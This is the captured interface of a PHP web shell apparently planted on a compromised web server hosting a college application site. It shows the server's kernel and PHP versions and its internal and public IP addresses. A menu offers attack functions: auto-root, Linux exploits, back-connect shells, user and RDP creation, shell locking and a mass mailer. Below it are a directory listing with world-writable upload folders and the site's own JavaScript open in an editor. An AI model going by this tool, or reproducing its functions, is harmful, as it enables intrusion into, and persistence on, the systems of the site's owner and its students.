Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.219.23.150
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
uet /
[ HOME SHELL ]
Name
Size
Permission
Action
Excel_Writer
[ DIR ]
drwxr-xr-x
Excel_reader
[ DIR ]
drwxr-xr-x
JQGrid3.5
[ DIR ]
drwxr-xr-x
Report_details
[ DIR ]
drwxr-xr-x
a
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
custom_js
[ DIR ]
drwxr-xr-x
custom_src
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
grid_display_files
[ DIR ]
drwxr-xr-x
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
maya-pdf
[ DIR ]
drwxr-xr-x
misc_files
[ DIR ]
drwxrwxrwx
schema
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxr-xr-x
tarka_pdf_latest
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
user_images
[ DIR ]
drwxr-xr-x
validation_files
[ DIR ]
drwxr-xr-x
.htaccess
602
B
-rwxr-xr-x
MainPage.html
12.31
KB
-rwxr-xr-x
MainPagepopup.html
7.05
KB
-rwxr-xr-x
OnlineApp.js
1010
B
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
928
B
-rwxr-xr-x
cconfig_old.php
1.13
KB
-rwxr-xr-x
collegeInfoPopup.html
3.76
KB
-rwxr-xr-x
favicon.ico
1.12
KB
-rwxr-xr-x
homepage.html
3.35
KB
-rwxr-xr-x
index.html
5.81
KB
-rwxr-xr-x
index_wait.html
20.93
KB
-rwxr-xr-x
indexlatest.html
5.16
KB
-rwxr-xr-x
indexlogin.html
5.96
KB
-rwxr-xr-x
indexold.html
5.19
KB
-rwxr-xr-x
logo.jpg
29.02
KB
-rwxr-xr-x
mainpage.htm
31.7
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : OnlineApp.js
function loadOnlineService() { $("#loadtab").css({ padding: "0px", "margin-bottom": "10%" }); $("#loadtab").load("html_modules/onlineApp.html?v=" + version, function() { var regno = $("#side_regno").val(); $.ajax({ type: "post", url: $host_url + `getDropDownList&univcode=${window.FUNIVCODE}`, success: function(response) { var { error_code, data, status } = JSON.parse(response); if (error_code == 0) { var servtype = data.servtype; var catcode = data.catcode; var options; for (var i = 0; i < servtype.length; i++) { options += `<option value="${servtype[i].int_code}">${servtype[i].val}</options>`; } $("#appfor").html(options); var options; for (var i = 0; i < catcode.length; i++) { options += `<option value="${catcode[i].int_code}">${catcode[i].val}</options>`; } $("#catcode").html(options); } } }); }); }
Close